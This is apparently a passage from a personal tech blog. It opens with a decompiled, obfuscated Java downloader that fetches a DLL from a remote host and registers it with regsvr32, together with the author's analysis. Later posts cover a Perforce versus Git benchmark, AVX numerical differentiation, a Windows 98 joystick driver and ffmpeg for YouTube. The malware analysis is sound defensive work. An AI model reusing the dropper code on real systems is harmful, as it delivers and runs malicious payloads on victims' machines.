"-1608+1708", "-9295+9403", "1145-1099", "-3163+3263", "1128600/9900", "-8965+9076", "187936/1678", "19698/201", "877011/7901", "131880/1099", "1166373/9969", "645725/5615", "378144/3744", "884754/7761", "6682-6583", "5108-4997", "6978-6868", "465160/4010", "-5936+6037", "-8888+8998", "3233-3117", "112608/2448", "173547/1753", "934842/8422", "-9633+9742", "-8287+8334", "122015/1061", "-9185+9232", "511-401", "4695-4582", "246-196", "747054/7546", "16848/156", "6884-6764", "1041376/9298", "245814/4638", "-380+478", "908096/8108", "7467-7418", "1991-1939", "496314/4242", "463191/4497", "7616-7507", "283645/6035", "-631+731", "-9425+9471", "1527-1427", "356087/3671", "750-634", "581364/9228", "494500/4945", "-6637+6745", "63684/1044", "373282/7618", "2797-2733", "-7249+7313", "48152/463", "1267-1151", "390920/3370", "2699-2587", "-3741+3799", "4039-3992", "4388-4341", "10035-9935", "7472-7364", "3009-2963", "703900/7039", "-1768+1882", "3989-3878", "-2428+2540", "1859-1761", "-997+1108", "896160/7468", "9975-9858", "2826-2711", "5551-5450", "8779-8665", "-9608+9707", "-2889+3000", "-2791+2901", "1091444/9409", "962833/9533", "1060840/9644", "766876/6611", "8089-8043", "4537-4438", "8676-8565", "9995-9886", "202993/4319", "-2066+2181", "9641-9594", "1240-1186", "439400/4394", "-8126+8178", "1569-1465", "1031803/9131", "5888-5831", "-390+499", "6926-6821", "727015/7495", "2654-2601", "-4765+4873", "7305-7208", "22781/209", "9164/79", "9732-9682", "379807/8081", "635900/6359", "2162/47", "-868+968", "368697/3801", "601808/5188", "5757-5694", "742600/7426", "284364/2633", "66917/1097", "324086/6614", "5472-5408", "1816-1752", "8744-8640", "-3693+3809", "-3808+3924", "2347-2235", "7587-7529", "-4639+4686", "453033/9639", "-3968+4068", "7742-7634", "8105-8059", "1974-1874", "130302/1143", "-3867+3978", "9258-9146", "745388/7606", "-6147+6258", "1861-1741", "-4457+4574", "6584-6469", "617817/6117", "-1147+1261", "730125/7375", "5865-5754", "-6220+6330", "351712/3032", 
"2090-1989", "594660/5406", "-6298+6414", "124246/2701", "9357-9258", "-2918+3029", "4900-4791", "-6028+6075", "-1320+1435", "-8833+8880", "193341/3791", "-4000+4117", "7277-7176", "989-875", "4746-4649", "905502/7943", "-6491+6546", "-9536+9586", "265742/2507", "-3708+3829", "306663/6013", "333617/3239", "-1314+1412", "-8100+8205", "-3346+3454", "-2672+2719", "-9219+9319", "2704-2658", "315100/3151", "6663-6566", "3204-3088", "8995-8932", "79300/793", "645300/5975", "212646/3486", "192325/3925", "542336/8474", "627200/9800", "289-185", "4809-4693", "-9579+9695", "1069488/9549", "392312/6764", "-3401+3448", "-4316+4363", "-4287+4387", "5817-5709", "2605-2559", "379300/3793", "-6022+6136", "378732/3412", "1069600/9550", "-5605+5703", "-4162+4273", "-5050+5170", "2218-2101", "1060185/9219", "1033-932", "-73+187", "3148-3049", "1096125/9875", "-5793+5903", "762700/6575", "-5287+5388", "506770/4607", "-1516+1632", "292008/6348", "7366-7267", "-6651+6762", "896089/8221", "478-431", "7107-6992", "-1043+1090", "817807/8431", "431054/3653", "954856/8024", "489888/8748", "302275/2675", "1101411/9747", "-3884+3982", "234498/2299", "402400/4024", "6473-6358", "3742-3640", "39984/714", "323907/3207", "26+31", "290472/5928", "4416-4369", "3708-3608", "56212/1222", "493500/4935", "4365/45", "-6149+6265", "-9227+9290", "490200/4902", "-5823+5931", "297436/4876", "7551-7502", "5293-5229", "423808/6622", "897-793", "-7916+8032", "5589-5473", "909328/8119", "-7967+8025", "-6910+6957", "-297+344", "2929-2829", "889596/8237", "9310-9264", "4811-4711", "520524/4566", "5861-5750", "430528/3844", "842702/8599", "393828/3548", "305040/2542", "8613-8496", "2302-2187", "141703/1403", "-3132+3246", "5021-4922", "925-814", "6273-6163", "-37+153", "377033/3733", "1096920/9972", "7381-7265", "8255-8209", "9546-9447", "34410/310", "60495/555", "752/16", "5600-5485", "-2588+2635", "-3180+3284", "881-833", "458900/9178", "-2808+2908", "-8996+9108", "411125/3575", "797680/6760", "804417/7247", 
"374132/3092", "-3703+3814", "920920/8372", "7044-6927", "-6653+6705", "4896-4777", "3179-3064", "158766/3378", "-2723+2823", "108008/2348", "378800/3788", "-3091+3188", "84448/728", "4158/66", "240500/2405", "334692/3099", "1170-1109", "-4080+4129", "-4619+4683", "320704/5011", "1164-1060", "973008/8388", "5409-5293", "1091-979", "9141-9083", "9400-9353", "132258/2814", "-8116+8216", "9072/84", "1235-1189", "-4633+4733", "466260/4090", "-267+378", "828-716", "239218/2441", "-1013+1124", "-2563+2683", "282204/2412", "-6120+6235", "2101-2000", "128478/1127", "-3313+3412", "-209+320", "4665-4555", "6356-6240", "-8404+8505", "-7696+7806", "6898-6782", "458252/9962", "-5038+5137", "633810/5710", "1939-1830", "-590+637", "8526-8411", "-9907+9954", "3061-3005", "8114-8017", "-6036+6087", "-251+367", "990784/8768", "982702/8258", "3697-3577", "-5585+5686", "7841-7739", "-8818+8924", "-8833+8955", "8662-8551", "177168/3691", "211152/3984", "8061-7948", "23970/510", "-454+554", "-8770+8816", "893900/8939", "680746/7018", "-7301+7417", "-5137+5200", "796900/7969", "262980/2435", "3583-3522", "309925/6325", "-3669+3733", "321728/5027", "3372-3268", "-1671+1787", "-2469+2585", "220416/1968", "1270-1212", "2632-2585", "166051/3533", "4436-4336", "7173-7065", "6174-6128", "3342-3242", "-2003+2117", "806-695", "-1117+1229", "101234/1033", "9313-9202", "-7006+7126", "3224-3107", "3999-3884", "-8288+8389", "1654-1540", "-8290+8389", "1540-1429", "-6272+6382", "-4157+4273", "207-106", "105380/958", "-8677+8793", "267674/5819", "2797-2698", "2528-2417", "-5027+5136", "85822/1826", "7124-7009", "160223/3409", "3950-3836", "-7987+8101", "-5176+5289", "4243-4192", "-7105+7221", "5725-5605", "-6086+6196", "139412/2681", "-6411+6526", "-5359+5457", "-9676+9794", "963696/9448", "6949-6893", "-3881+3931", "291042/2553", "-2674+2721", "237100/2371", "-7411+7457", "2447-2347", "-3285+3382", "-797+913", "480249/7623", "3561-3461", "-9865+9973", "572119/9379", "6221-6172", "101184/1581", 
"236096/3689", "8640-8536", "348/3", "1021148/8803", "3495-3383", "-7999+8057", "290037/6171", "8674-8627", "56400/564", "1629-1521", "6936-6890", "96200/962", "4510-4396", "156954/1414", "-4414+4526", "697662/7119", "-6591+6702", "4246-4126", "-6488+6605", "4935-4820", "7059-6958", "-4843+4957", "-707+806", "354090/3190", "-7188+7298", "-2993+3109", "10069-9968", "853820/7762", "-7397+7513", "6739-6693", "701118/7082", "-5362+5473", "60+49", "7774-7727", "414-299", "454443/9669", "5125-5008", "349468/7132", "879564/7924", "-4999+5100", "5200-5149", "-9626+9738", "382928/3419", "-2817+2924", "86926/887", "918720/9280", "-289+402", "5813-5704", "264650/5293", "-3291+3400", "7701-7648", "-2363+2410", "-8995+9095", "-8600+8646", "-3987+4087", "-3321+3418", "5793-5677", "5534-5471", "3906-3806", "-5402+5510", "370819/6079", "158613/3237" }; DecimalFormat dec = new DecimalFormat("#.#"); StringBuilder CYBNAFHZKEIKXPLC = new StringBuilder(FMMNX.length); for (int i = 0; i < FMMNX.length; i++) { Object MHNZLISTNGUBBLYPW = PTTQWFAFBA.eval(FMMNX[i]); int HOFMVNSB = Integer.parseInt(dec.format(MHNZLISTNGUBBLYPW)); CYBNAFHZKEIKXPLC.append((char)HOFMVNSB); } return CYBNAFHZKEIKXPLC.toString(); } public static String CAHWNGGYPLSBBUUNSBJ() throws ScriptException { ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager(); ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js"); String[] HYOZXBQ = { "1115-1048", "-6817+6875", "-3904+3996", "-5117+5209", "5298-5214", "-2006+2107", "85347/783", "-3448+3560", "538936/5858", "7300-7208" }; DecimalFormat dec = new DecimalFormat("#.#"); StringBuilder GPJSTAPR = new StringBuilder(HYOZXBQ.length); for (int i = 0; i < HYOZXBQ.length; i++) { Object XWHLAWQKM = PTTQWFAFBA.eval(HYOZXBQ[i]); int HOFMVNSB = Integer.parseInt(dec.format(XWHLAWQKM)); GPJSTAPR.append((char)HOFMVNSB); } return GPJSTAPR.toString(); } public static String YFQZBLOYEFEJKKEZX() throws ScriptException { ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = 
new ScriptEngineManager(); ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js"); String[] FYTFHDCQEJALCVHVO = { "5128-5060", "-2483+2569", "-8949+9034", "-2140+2228", "-906+993", "233358/5073", "3644-3577", "-1064+1134", "234868/3308" }; DecimalFormat dec = new DecimalFormat("#.#"); StringBuilder EXRCSQZHBXONTDCJDKHHGQXL = new StringBuilder(FYTFHDCQEJALCVHVO.length); for (int i = 0; i < FYTFHDCQEJALCVHVO.length; i++) { Object NXCJBUAWXRGTXWMAHLVXKDY = PTTQWFAFBA.eval(FYTFHDCQEJALCVHVO[i]); int HOFMVNSB = Integer.parseInt(dec.format(NXCJBUAWXRGTXWMAHLVXKDY)); EXRCSQZHBXONTDCJDKHHGQXL.append((char)HOFMVNSB); } return EXRCSQZHBXONTDCJDKHHGQXL.toString(); } public static String MOXEQWXISCYNNWKTZZSFWDE() throws ScriptException { ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager(); ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js"); String[] WNGLMMJMJETKBDUOXWG = { "5448-5334", "837-736", "-8790+8893", "3219-3104", "382084/3238", "9614-9500", "-6355+6406", "-8462+8512", "1986-1954", "8435-8388", "-245+360" }; DecimalFormat dec = new DecimalFormat("#.#"); StringBuilder QSPKYREOAFQCRN = new StringBuilder(WNGLMMJMJETKBDUOXWG.length); for (int i = 0; i < WNGLMMJMJETKBDUOXWG.length; i++) { Object MAGXWHPMLWCNYSQWDSMLQXDB = PTTQWFAFBA.eval(WNGLMMJMJETKBDUOXWG[i]); int HOFMVNSB = Integer.parseInt(dec.format(MAGXWHPMLWCNYSQWDSMLQXDB)); QSPKYREOAFQCRN.append((char)HOFMVNSB); } return QSPKYREOAFQCRN.toString(); } public static String IBUPOZJE() throws ScriptException { ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager(); ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js"); String[] AWEJEIHRHYSRQJROC = { "-9628+9692", "-2870+2934" }; DecimalFormat dec = new DecimalFormat("#.#"); StringBuilder CKUNUFCT = new StringBuilder(AWEJEIHRHYSRQJROC.length); for (int i = 0; i < AWEJEIHRHYSRQJROC.length; i++) { Object XUQOYXRSCEBJYGAVPNYEOX = PTTQWFAFBA.eval(AWEJEIHRHYSRQJROC[i]); int HOFMVNSB = 
Integer.parseInt(dec.format(XUQOYXRSCEBJYGAVPNYEOX)); CKUNUFCT.append((char)HOFMVNSB); } return CKUNUFCT.toString(); } public static void EEZDHQ() throws ScriptException, IOException, InterruptedException { int d = 0; while (d < 15) { Runtime.getRuntime().exec(MOXEQWXISCYNNWKTZZSFWDE() + " " + CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX()); Thread.sleep(765L); d++; } } public static void WRZSTL(String TLOLIOXWCPD, String QVBBFQEDYWO) throws IOException, ScriptException, InterruptedException { InputStream WHBMGLAOEDNRJGMHKUKECXJJ = URI.create(TLOLIOXWCPD).toURL().openStream(); Files.copy(WHBMGLAOEDNRJGMHKUKECXJJ, Paths.get(QVBBFQEDYWO, new String[0]), new CopyOption[0]); EEZDHQ(); } public static void main(String[] args) throws Exception { new File(CAHWNGGYPLSBBUUNSBJ()).mkdir(); File q = new File(CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX()); if (q.exists()) { EEZDHQ(); } else { String[] VRNBQZSLUR = PACVA().split(IBUPOZJE()); for (String DXFKOE : VRNBQZSLUR) { URL currentDXFKOE = new URL(DXFKOE); HttpURLConnection UKGANNEOZAGVBOQAMFBXU = (HttpURLConnection)currentDXFKOE.openConnection(); UKGANNEOZAGVBOQAMFBXU.connect(); if (UKGANNEOZAGVBOQAMFBXU.getResponseCode() / 100 == 2) { String HFCIHAULSQLBJMNFAFQ = DXFKOE; String CPTENFMT = CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX(); WRZSTL(HFCIHAULSQLBJMNFAFQ, CPTENFMT); break; } } } } }

Obviously, code like this will not make much sense to anybody, and it’s obvious that it was processed by some kind of an obfuscator.
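The listing hides every string as an array of one-operation arithmetic expressions, which it evaluates through the JavaScript ScriptEngine and casts to characters. As an added example (not code from the original post), the Python below decodes such arrays statically with a restricted parser, so nothing from the sample is executed; the four arrays are copied from the listing, and the function names are my own.

```python
import re

# The four short String[] arrays from the decompiled listing on this page,
# with the surrounding method bodies dropped (excerpt assembled for this example).
SAMPLE_SOURCE = r'''
String[] HYOZXBQ = { "1115-1048", "-6817+6875", "-3904+3996", "-5117+5209",
    "5298-5214", "-2006+2107", "85347/783", "-3448+3560", "538936/5858", "7300-7208" };
String[] FYTFHDCQEJALCVHVO = { "5128-5060", "-2483+2569", "-8949+9034", "-2140+2228",
    "-906+993", "233358/5073", "3644-3577", "-1064+1134", "234868/3308" };
String[] WNGLMMJMJETKBDUOXWG = { "5448-5334", "837-736", "-8790+8893", "3219-3104",
    "382084/3238", "9614-9500", "-6355+6406", "-8462+8512", "1986-1954", "8435-8388",
    "-245+360" };
String[] AWEJEIHRHYSRQJROC = { "-9628+9692", "-2870+2934" };
'''

ARRAY_RE = re.compile(r'String\[\]\s+(\w+)\s*=\s*\{(.*?)\}', re.S)
ITEM_RE = re.compile(r'"([^"]*)"')
# Exactly one binary operation on two decimal integers; only the first may be signed.
EXPR_RE = re.compile(r'^\s*(-?\d+)\s*([+\-/])\s*(\d+)\s*$')


class DecodeError(ValueError):
    """An array element is not a plain character-code expression."""


def eval_char_expr(expr):
    """Return the character code encoded by one expression, without eval()."""
    m = EXPR_RE.match(expr)
    if not m:
        raise DecodeError("not a two-operand integer expression: %r" % expr)
    left, op, right = int(m.group(1)), m.group(2), int(m.group(3))
    if op == '+':
        value = left + right
    elif op == '-':
        value = left - right
    else:
        # The Java side feeds the result to Integer.parseInt, so a fractional
        # quotient would throw there; treat it as invalid here as well.
        if right == 0 or left % right != 0:
            raise DecodeError("division is not exact: %r" % expr)
        value = left // right
    if not 0 <= value <= 0xFFFF:  # must fit a Java char
        raise DecodeError("result outside char range: %r" % expr)
    return value


def decode_arrays(java_source):
    """Decode every String[] initialiser; return (decoded, errors) keyed by array name."""
    decoded, errors = {}, {}
    for name, body in ARRAY_RE.findall(java_source):
        try:
            decoded[name] = ''.join(chr(eval_char_expr(e)) for e in ITEM_RE.findall(body))
        except DecodeError as exc:
            errors[name] = str(exc)  # keep going; report what could not be decoded
    return decoded, errors


def rebuild_command(decoded):
    """String that EEZDHQ() in the listing passes to Runtime.exec()."""
    # Array-to-method mapping read off the listing:
    # MOXEQWXISCYNNWKTZZSFWDE() + " " + CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX()
    return (decoded["WNGLMMJMJETKBDUOXWG"] + " "
            + decoded["HYOZXBQ"] + decoded["FYTFHDCQEJALCVHVO"])


if __name__ == "__main__":
    strings, problems = decode_arrays(SAMPLE_SOURCE)
    for array_name, text in strings.items():
        print("%-22s %r" % (array_name, text))
    print("exec argument:", rebuild_command(strings))
    print("undecodable arrays:", problems)
```
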
The presence of an HttpURLConnection object is already a red flag, though : after removing all the potentially malicious calls, and placing prints for the strings that are de-obfuscated at runtime, I got the following :

```
C:\\Temp\\DVUXW.CFG
regsvr32 /s C:\\Temp\\DVUXW.CFG
```

I have to say that the obfuscator did a pretty good job on scrambling these. From what I can gather, the JAR is responsible for calling regsvr32 on the DVUXW.CFG file, and downloading it from a Dropbox account if it’s not present on the system yet. The file itself is actually a DLL. I downloaded it and tried to dissect it on my Windows XP virtual machine, but I did not get far : it is quite big. However, it imports the most important functions from the Windows Cryptography API, as well as WriteFile. However, I was not able to see any communication attempts or socket creation inside the code, which means that this is probably not a piece of ransomware like CryptoLocker. It seems like the binary can be identified by the strings fuckoffnabs1 and myNameIsPepe present inside it. I also submitted the binary to Malwr for analysis.

## Perforce and Git : a synthetic benchmark

While at work, I needed to delete around 35000 files from a Perforce repository. Unfortunately for me (and all of us working over here), the main server is in Korea, which means that actually using the VCS is a giant PITA that most of us would like to avoid. Because of the fairly long response times, pretty much every action performed on the repository takes more or less one second. So you can easily calculate the whole time needed for deleting 35000 files : around 10 hours. I left my computer running overnight so it could peacefully complete the task.

That made me wonder : how long would that task take if Perforce was running on a local server? Also, I wanted to see how these times compare to the VCS I use more often, namely Git.
I created 35000 files containing (supposedly) random data with the following command :

```
for((i=0;i<35000;++i))
do
    dd if=/dev/urandom of=file$i.bin bs=$RANDOM count=1 >/dev/null 2>&1
done
```

$RANDOM is guaranteed to be between 0 and 32767 by Bash, so the files were maximum 32KB in size. Here are the benchmark results for git :

```
daniel@Jurij:~/test$ time git add .
real 0m17.467s
user 0m15.283s
sys 0m1.830s

daniel@Jurij:~/test$ time git commit -qam test
real 0m0.171s
user 0m0.097s
sys 0m0.070s

daniel@Jurij:~/test$ time git rm -rq .
real 3m42.355s
user 3m37.257s
sys 0m5.010s

daniel@Jurij:~/test$ time git commit -qam test
real 0m0.016s
user 0m0.013s
sys 0m0.000s
```

After seeing these numbers, I found them to be adequate. Then, I set up a Perforce server on my Ubuntu virtual machine, since Perforce offers trial versions of their software for installations which serve less than 20 users (and offer less than 20 workspaces, if you speak perforceish). After starting the server, setting up my user and the workspace, I ran these commands, of course having recreated the files beforehand.

```
daniel@daniel-VirtualBox:~/p4/test$ time find . -type f -exec p4 add -t binary '{}' >/dev/null +
real 0m5.572s
user 0m0.191s
sys 0m0.095s

daniel@daniel-VirtualBox:~/p4/tset$ time p4 submit -d test >/dev/null
real 1m19.138s
user 0m3.668s
sys 0m2.588s

daniel@daniel-VirtualBox:~/p4/test$ time find . -type f -exec p4 delete '{}' >/dev/null +
real 0m5.774s
user 0m0.600s
sys 0m0.528s

daniel@daniel-VirtualBox:~/p4/test$ time p4 submit -d test >/dev/null
real 0m2.817s
user 0m0.061s
sys 0m0.004s
```

The Perforce commandline client does not support passing wildcards, so I had to use find to help me in the task. The number of actual calls made to the application was minimized by the usage of ‚+’ instead of ‚;’ at the end of the invocation.

I did find the results quite surprising. I was expecting Git to easily trump Perforce in terms of performance, but this test quickly showed that this was clearly not the case. I still find Git much easier to use than Perforce, though. Especially considering the network lag introduced by my workplace environment, and the extra limitations put on the repository by corporate rules.


## Numerical differentiation using the finite difference formula implemented with AVX

During another one of my assembly-related escapades, I came across the following problem : using the finite difference formula, create a function that would calculate the values of a given function’s derivative, given the beginning and end point to be inspected, as well as the precision, i.e. how many samples (individual values) to take in that area. The function being inspected was a simple quadratic function, given by the general formula $f(x) = ax^2 + bx + c \; (a,b,c \in \mathbb{R})$. Of course, it has a very trivial derivative of $f'(x) = 2ax + b$, but the computer doesn’t necessarily know that.

The finite difference formula can be summarized as follows : if we need to calculate $n \; \in \mathbb{Z}$ values of a function’s derivative on the area of $ \; (a,b \in \mathbb{R})$, then the value of the derivative can be approximated by the following formula :

$f'(x) = \frac{f(x + \Delta x) - f(x - \Delta x)}{2 \Delta x}$

where $\Delta x = \frac{b-a}{n}$, i.e. the size of a single „step” according to the selected precision – the bigger the precision, the „smaller” the step is and thus the function is calculated with a greater granularity.

Writing some sequential code for this formula is obviously trivial. Parallelization of the computations can be a more difficult task, though. In my approach, I chose to use „masks” (couldn’t come up with a better name for these, unfortunately : they kind of resemble bitmasks, that’s why the name came to me, I guess) which represent the increments (or decrements) of their respective arguments. There are four such „masks” :

• the „dx mask”, which contains the value of $\Delta x$ multiplied by 8, since there are 8 values calculated in one iteration of the loop
• the „2dx mask”, simply containing $\Delta x$ multiplied by 2 – this is the value by which the calculated values are divided
• the „plus mask”, which contains the values of $\Delta x$ multiplied by 1 to 8. This mask is used to calculate the value of $x + \Delta x$ in the loop, which is later used as an argument for the function.
• the „minus mask”, which contains the values of $\Delta x$ multiplied by -1 to 6. Analogously to the „plus mask”, it is used to calculate the value of $x - \Delta x$.

Each of those masks takes up a whole YMM register and is added to the current quadratic function arguments, producing new arguments for which the value of the derivative is calculated.

I do realize that this all may be quite confusing, so let me illustrate this on a diagram. It attempts to show (though poorly) what is done in one iteration of the loop.

YMM5 represents the „current position” within the function, i.e. the current argument. After adding the „plus” and „minus masks” to these values, every respective element of the resulting YMM register contains the argument to the function which corresponds to the argument required by the formula of the theorem. Therefore, after calculating the value of that function, subtracting the respective values from each other and dividing these results by $2 \Delta x$, we obtain the „dval”, which is the final value of the derivative of the function at the given point. That value is written to memory. The „current position” is incremented by $8 \Delta x$ and the loop is executed again (unless the required number of iterations has been reached).

If there are any leftover values, they are calculated by normal sequential code, operating on one element in one iteration. The sequential loop will make at most 7 iterations, so it’s not a bottleneck by any means.
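To make the mask arithmetic concrete, here is an added example (a scalar Python model, not the assembly from the original post) that treats each YMM register as a list of 8 lanes and follows the same steps, including the sequential tail. It assumes the first sample is taken at the start point itself and uses Python doubles, so it illustrates the indexing rather than the exact floating-point results of the AVX code.

```python
LANES = 8  # values produced per loop iteration, as described in the post

PLUS_MULTIPLIERS = list(range(1, LANES + 1))    # 1 .. 8
MINUS_MULTIPLIERS = list(range(-1, LANES - 1))  # -1 .. 6


def quadratic(a, b, c, x):
    return a * x * x + b * x + c


def derivative_samples(a, b, c, start, end, n):
    """Approximate f'(x) at start + i*dx for i = 0 .. n-1 using the four masks."""
    dx = (end - start) / n
    dx_mask = [LANES * dx] * LANES                    # advances the position
    two_dx_mask = [2 * dx] * LANES                    # divisor of the formula
    plus_mask = [k * dx for k in PLUS_MULTIPLIERS]    # offsets giving x + dx
    minus_mask = [k * dx for k in MINUS_MULTIPLIERS]  # offsets giving x - dx

    position = [start] * LANES  # plays the role of YMM5: the current argument
    out = []

    for _ in range(n // LANES):
        x_plus = [p + m for p, m in zip(position, plus_mask)]
        x_minus = [p + m for p, m in zip(position, minus_mask)]
        # Lane i holds (f(x + (i+1)dx) - f(x + (i-1)dx)) / 2dx, which is the
        # central difference around x + i*dx.
        dval = [
            (quadratic(a, b, c, xp) - quadratic(a, b, c, xm)) / d
            for xp, xm, d in zip(x_plus, x_minus, two_dx_mask)
        ]
        out.extend(dval)  # the store to memory
        position = [p + s for p, s in zip(position, dx_mask)]

    # Leftover values: at most LANES - 1 iterations of plain sequential code.
    x = position[0]
    for _ in range(n % LANES):
        out.append((quadratic(a, b, c, x + dx) - quadratic(a, b, c, x - dx)) / (2 * dx))
        x += dx
    return out


if __name__ == "__main__":
    a, b, c = 3.0, -2.0, 5.0
    values = derivative_samples(a, b, c, 0.0, 1.0, 19)  # 2 vector passes + 3 leftovers
    for i, v in enumerate(values):
        exact = 2 * a * (i / 19) + b
        print("i=%2d  approx=% .12f  exact=% .12f" % (i, v, exact))
```

For a quadratic the central difference equals the analytic derivative up to rounding, which makes an off-by-one in either mask easy to spot in the printed comparison.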

I also came across a very interesting issue related to memory performance and its correlation with the alignment of the address. All the SSE instructions required the destination (or source, in the case of using instructions operating on packed data) memory operand’s address to be 16-byte aligned. If it wasn’t aligned, a general protection fault was reported while executing that instruction. One of the few SSE instructions that didn’t require the address to be 16-byte aligned was movups, but using non-16-byte aligned addresses resulted in a dramatic performance decrease. I found this not to be true anymore in the case of AVX. The Intel Basic Architecture manual says that

Most VEX-encoded SIMD numeric and data processing instruction semantics with memory operand have relaxed memory alignment requirements than instructions encoded using SIMD prefixes.
(section 13.1.3)

and

With the exception of explicitly aligned 16 or 32 byte SIMD load/store instructions, most VEX-encoded, arithmetic and data processing instructions operate in a flexible environment regarding memory address alignment, i.e. VEX-encoded instruction with 32-byte or 16-byte load semantics will support unaligned load operation by default. Memory arguments for most instructions with VEX prefix operate normally without causing #GP(0) on any byte-granularity alignment (unlike Legacy SSE instructions).
(section 13.3)

I was curious to find out what kind of penalty an unaligned memory access actually introduces. In order to do that, I compared the performance of the function when the destination array was allocated via standard malloc (which is guaranteed to return an 8-byte aligned address when using glibc, I don’t know about any other libc implementations) and mmap (which returns addresses located on a page boundary, which is 4KB in case of x86). The results showed that there is a 5% increase in performance when using the address returned by mmap. I thought that this might be improved even more by changing the instruction from movups to movaps, self-modifying the instruction after checking the address’ alignment. The results were not satisfactory, though : differences in performance were negligible, around 0.041%, which most certainly can’t be considered an improvement considering all the extra code that must be added in order to allow the function to modify itself. So, the good news is : you can always use movups for memory transfers in AVX, since it doesn’t introduce any kind of performance penalty when the pointer is aligned, and doesn’t fail if it’s unaligned. Just keep the addresses aligned yourself and you’ll be fine.

Here’s the source of the implementation. The assembly is written using the AMD64 ABI, was compiled under gcc 4.6.3 and nasm 2.09.10. The program actually using the function is written like a benchmark : it performs 10000 executions of the function with precision 5000007, randomizing the parameters beforehand, and sums the number of ticks returned by rdtsc, writing the average number of ticks from all the iterations to stdout on exit.

Regarding my last joystick-related project : had to put it on hold until further notice. This is the kind of thing that bites you on the ass once you leave it for some time and then want to come back to it, since coming back to it takes a lot of time. I’d like to continue it, obviously, but it doesn’t seem likely nowadays.


## Windows 98 DDK (Driver Development Kit) and VXD joystick drivers

In the past few days, I started working on reverse-engineering a joystick driver written for Windows 98. It’s a six-button joystick which uses the ordinary (and, of course, obsolete by today’s standards) gameport. Since the gameport provides only four actual pins for representing buttons, drivers for devices that had more buttons had to use some sort of multiplexing. The main motivation behind this is to find out what kind of multiplexing is employed – and also, hopefully, write a driver for this joystick for Linux.

The first problem related to this was finding a utility that would read the contents of the VXD file containing the driver. The format of this file is the LX/LE „Linear Executable” executable format, which was used in OS/2 and early versions of Windows before the PE format took over. Fortunately, after some googling (and trying to write my own dumper for this format) I found a great utility called DUMPLX. It’s simply amazing, and features a full disassembler of the executable contents, and disassembles VMM/VxD calls as normal instructions, which was just what I was looking for.

The second problem was finding the definitions of the constants and structures used in the program. Microsoft doesn’t distribute old DDKs anymore, but I managed to get a hold of a copy of the Windows 98 DDK, which contains all the include files that I needed to work out what all the magic numbers mean. I put it up on my mediafire account if anybody needs it : click.

Now, back to disassembling…


## How to upload a song without a music video to YouTube?

Quite often, you might find yourself in a situation in which you want to upload a song to YouTube which doesn’t have an accompanying music video. YouTube, being – obviously – a video sharing site, doesn’t accept only audio files and will reject them when uploading. I was wondering if there was a simple way to create a video that would contain the album cover shown throughout the whole length of the audio track.

Of course, the most obvious solution to this would be to use a video editing tool like the Windows Movie Maker, Sony Vegas, or Adobe Premiere, but that seemed like an overkill for such a – supposedly – simple task. Fortunately, the ffmpeg project can do it all automagically in one command, which was just the solution that I was looking for.

But let’s have a look at what YouTube wants from us first so that we can upload our content in the highest possible quality. The advanced encoding specifications show that the highest audio bitrate is allowed in 720p video files and equals 384 kbps. The recommended audio codec is AAC-LC, so you can use the Nero AAC Encoder or FAAC in order to encode the audio file into AAC (hopefully, from a lossless source!).

If you’ve got your audio files ready, it’s time to start making them into YouTube-compatible 720p files so that the audio bitrate is preserved and the resulting upload has the same high quality audio track. That’s where the aforementioned ffmpeg comes in. Hold on to your seats, now.

```
ffmpeg -loop 1 -r 5 -i $IMAGE_FILE -i $AUDIO_FILE -c:v libx264 -preset slow -crf 18 -tune stillimage -c:a copy \
    -filter:v "[in] scale=-1:720, pad=1280:720:640-iw/2 [out]" -shortest output.mp4
```

This is the command that will take your $AUDIO_FILE, put it together with $IMAGE_FILE and produce output.mp4, which is a video file with 1280×720 resolution with the $IMAGE_FILE centered in its every frame encoded with x264, and $AUDIO_FILE as the audio track. The length of output.mp4 is equal to the length of $AUDIO_FILE. Let us have a look at the parameters themselves, though :

• -loop 1 states that the input files should be looped indefinitely. This is so that the video track consists of repeated frames and not just one single frame, which is what ffmpeg would do by default – and YouTube doesn’t like it, since it requires video and audio tracks to be of equal lengths.
• -r 5 specifies the frame rate for the video track. Since ours consists of just a still image, it doesn’t make sense to have the video track run at a full 25 / 23.976 fps, which would just unnecessarily enlarge the size of the resulting file. Having -r 1 makes the video track much longer than the audio track, for some bizarre reason.
• -i $IMAGE_FILE and -i $AUDIO_FILE are both input file declarations. The format of the files and whether they’re video or audio files is detected by ffmpeg at runtime.
• -c:v libx264 chooses libx264 as the codec used to encode the video track. Thus, the resulting data is encoded in YouTube-compatible H.264 format.
• -preset slow -crf 18 -tune stillimage are options passed to the x264 encoder. If you want to get to the bottom of them, I suggest reading this page.
• -c:a copy specifies that no processing whatsoever should be done to the audio track and that the track in the resulting file should be an exact copy of the input audio track.
• -filter:v "[in] scale=-1:720, pad=1280:720:640-iw/2 [out]" is the filter specification for the output video track. Here, we specify that the input image should first be pre-scaled to be 720 pixels high, while preserving the aspect ratio. Then, we pad the scaled image (assuming „normalized” album cover dimensions, we’re now dealing with a 720×720 image) with black borders to the size of 1280×720, and put the actual image at (640-iw/2), which happens to be the middle of the image. iw is the width of the input, i.e. what’s received from the scale filter.
• -shortest tells ffmpeg to stop encoding when the shortest encoded track ends. In our case this is the audio track, since the image is looped indefinitely.
• output.mp4 is just the output file name. ffmpeg automagically performs all the necessary muxing and handles output to the MP4 container.

That’s pretty much all there is to it. The resulting videos can be uploaded to YouTube without any further hassle. If you’re curious how the effect looks, here’s one of the videos that I prepared that way : click.

On a side note : it is possible to skip the first step, which consists of preparing the audio files manually with an external AAC encoder, and just have it all done by ffmpeg, thus simplifying the process even more. However, support for encoding AAC in ffmpeg is experimental and the sound quality of the result usually leaves much to be desired. If you would like to try it out, though, then use the following command.

```
